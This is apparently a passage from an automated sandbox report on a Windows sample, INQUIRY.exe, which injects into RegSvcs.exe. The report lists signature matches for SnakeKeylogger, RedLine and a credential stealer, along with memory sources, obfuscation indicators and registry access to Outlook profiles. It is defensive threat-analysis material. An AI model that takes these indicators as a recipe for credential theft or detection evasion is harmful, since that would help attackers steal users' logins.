              Source: 3.2.RegSvcs.exe.3f85570.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.RegSvcs.exe.5630000.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.RegSvcs.exe.5630000.8.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.RegSvcs.exe.2d11aa6.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.RegSvcs.exe.2d11aa6.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000000.00000002.1694806382.0000000001DB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 00000003.00000002.4149427302.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 00000003.00000002.4151695698.0000000003F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000003.00000002.4152396283.0000000005630000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000003.00000002.4152396283.0000000005630000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000003.00000002.4152065561.00000000055A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000003.00000002.4152065561.00000000055A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000002.00000002.1709473928.0000000001DE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 00000003.00000002.4150340194.0000000002CD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: RegSvcs.exe PID: 7348, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.RegSvcs.exe.55a0ee8.6.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
              Source: 3.2.RegSvcs.exe.55a0ee8.6.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
              Source: 3.2.RegSvcs.exe.3fae590.5.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
              Source: 3.2.RegSvcs.exe.3fae590.5.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
              Source: 3.2.RegSvcs.exe.3f86458.4.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
              Source: 3.2.RegSvcs.exe.3f86458.4.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
              Source: 3.2.RegSvcs.exe.5630000.8.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
              Source: 3.2.RegSvcs.exe.5630000.8.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
              Source: 3.2.RegSvcs.exe.5630000.8.raw.unpack, UltraSpeed.csCryptographic APIs: 'TransformFinalBlock'
              Source: 3.2.RegSvcs.exe.5630000.8.raw.unpack, COVIDPickers.csCryptographic APIs: 'TransformFinalBlock'
              Source: 3.2.RegSvcs.exe.2d11aa6.2.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
              Source: 3.2.RegSvcs.exe.2d11aa6.2.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/6@3/3
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A7A06A GetLastError,FormatMessageW,0_2_00A7A06A
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A681CB AdjustTokenPrivileges,CloseHandle,0_2_00A681CB
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A687E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00A687E1
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A7B3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00A7B3FB
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A8EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00A8EE0D
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A883BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,0_2_00A883BB
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A14E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00A14E89
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
              Source: C:\Users\user\Desktop\INQUIRY.exeFile created: C:\Users\user\AppData\Local\Temp\aut7EA8.tmpJump to behavior
              Source: INQUIRY.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\INQUIRY.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: RegSvcs.exe, 00000003.00000002.4150460368.00000000030EF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4150460368.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4150460368.00000000030E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: INQUIRY.exeVirustotal: Detection: 45%
              Source: INQUIRY.exeReversingLabs: Detection: 47%
              Source: unknownProcess created: C:\Users\user\Desktop\INQUIRY.exe "C:\Users\user\Desktop\INQUIRY.exe"
              Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\INQUIRY.exe"
              Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Users\user\Desktop\INQUIRY.exe "C:\Users\user\Desktop\INQUIRY.exe"
              Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\INQUIRY.exe"
              Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\INQUIRY.exe"Jump to behavior
              Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Users\user\Desktop\INQUIRY.exe "C:\Users\user\Desktop\INQUIRY.exe"Jump to behavior
              Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\INQUIRY.exe"Jump to behavior
              Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: INQUIRY.exeStatic file information: File size 1091584 > 1048576
              Source: INQUIRY.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: INQUIRY.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: INQUIRY.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: INQUIRY.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: INQUIRY.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: INQUIRY.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: INQUIRY.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: _.pdb source: RegSvcs.exe, 00000003.00000002.4151695698.0000000003F81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4152065561.00000000055A0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4150340194.0000000002CD0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: INQUIRY.exe, 00000000.00000003.1692742553.0000000003A10000.00000004.00001000.00020000.00000000.sdmp, INQUIRY.exe, 00000000.00000003.1693204373.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, INQUIRY.exe, 00000002.00000003.1707799950.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, INQUIRY.exe, 00000002.00000003.1704430637.0000000003A10000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: INQUIRY.exe, 00000000.00000003.1692742553.0000000003A10000.00000004.00001000.00020000.00000000.sdmp, INQUIRY.exe, 00000000.00000003.1693204373.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, INQUIRY.exe, 00000002.00000003.1707799950.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, INQUIRY.exe, 00000002.00000003.1704430637.0000000003A10000.00000004.00001000.00020000.00000000.sdmp
              Source: INQUIRY.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: INQUIRY.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: INQUIRY.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: INQUIRY.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: INQUIRY.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

              Data Obfuscation

              barindex
              .NET source code contains method to dynamically call methods (often used by packers)
              Source: 3.2.RegSvcs.exe.55a0ee8.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
              Source: 3.2.RegSvcs.exe.3fae590.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
              Source: 3.2.RegSvcs.exe.3f86458.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
              Source: 3.2.RegSvcs.exe.5630000.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
              Source: 3.2.RegSvcs.exe.2d11aa6.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A14B37 LoadLibraryA,GetProcAddress,0_2_00A14B37
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A7848F push FFFFFF8Bh; iretd 0_2_00A78491
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A3E70F push edi; ret 0_2_00A3E711
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A3E828 push esi; ret 0_2_00A3E82A
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A38945 push ecx; ret 0_2_00A38958
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A3EAEC push edi; ret 0_2_00A3EAEE
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A3EA03 push esi; ret 0_2_00A3EA05
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0041C40C push cs; iretd 3_2_0041C4E2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00423149 push eax; ret 3_2_00423179
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0041C50E push cs; iretd 3_2_0041C4E2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0040E21D push ecx; ret 3_2_0040E230
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0041C6BE push ebx; ret 3_2_0041C6BF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0041BFCD pushad ; ret 3_2_0041BFCE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0040BB97 push dword ptr [ecx-75h]; iretd 3_2_0040BBA3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02BA52A6 push esp; ret 3_2_02BA52A9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06C62E40 push 18418B06h; ret 3_2_06C62E53
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06C6AF84 push dword ptr [ecx+ecx-75h]; iretd 3_2_06C6AF8A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06C65FA1 push 10418B06h; ret 3_2_06C65FB3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06C6B421 push C0335006h; mov dword ptr [esp], eax3_2_06C6B44B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06C66A90 push 2C418B06h; ret 3_2_06C66AA3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06C66AB1 push 0C418B06h; ret 3_2_06C66AC3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06C66A10 push 1C418B06h; ret 3_2_06C66A23
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06C660B0 push 18418B06h; ret 3_2_06C660C3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06C63824 push 04418B06h; ret 3_2_06C660A3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06C669D1 push 08418B06h; ret 3_2_06C669E3
              Source: 3.2.RegSvcs.exe.55a0ee8.6.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'eKYVC7ZjuiDv8', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
              Source: 3.2.RegSvcs.exe.3fae590.5.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'eKYVC7ZjuiDv8', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
              Source: 3.2.RegSvcs.exe.3f86458.4.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'eKYVC7ZjuiDv8', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
              Source: 3.2.RegSvcs.exe.5630000.8.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'eKYVC7ZjuiDv8', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
              Source: 3.2.RegSvcs.exe.2d11aa6.2.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'eKYVC7ZjuiDv8', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A148D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00A148D7
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A95376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00A95376
              Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00A33187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00A33187
              Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
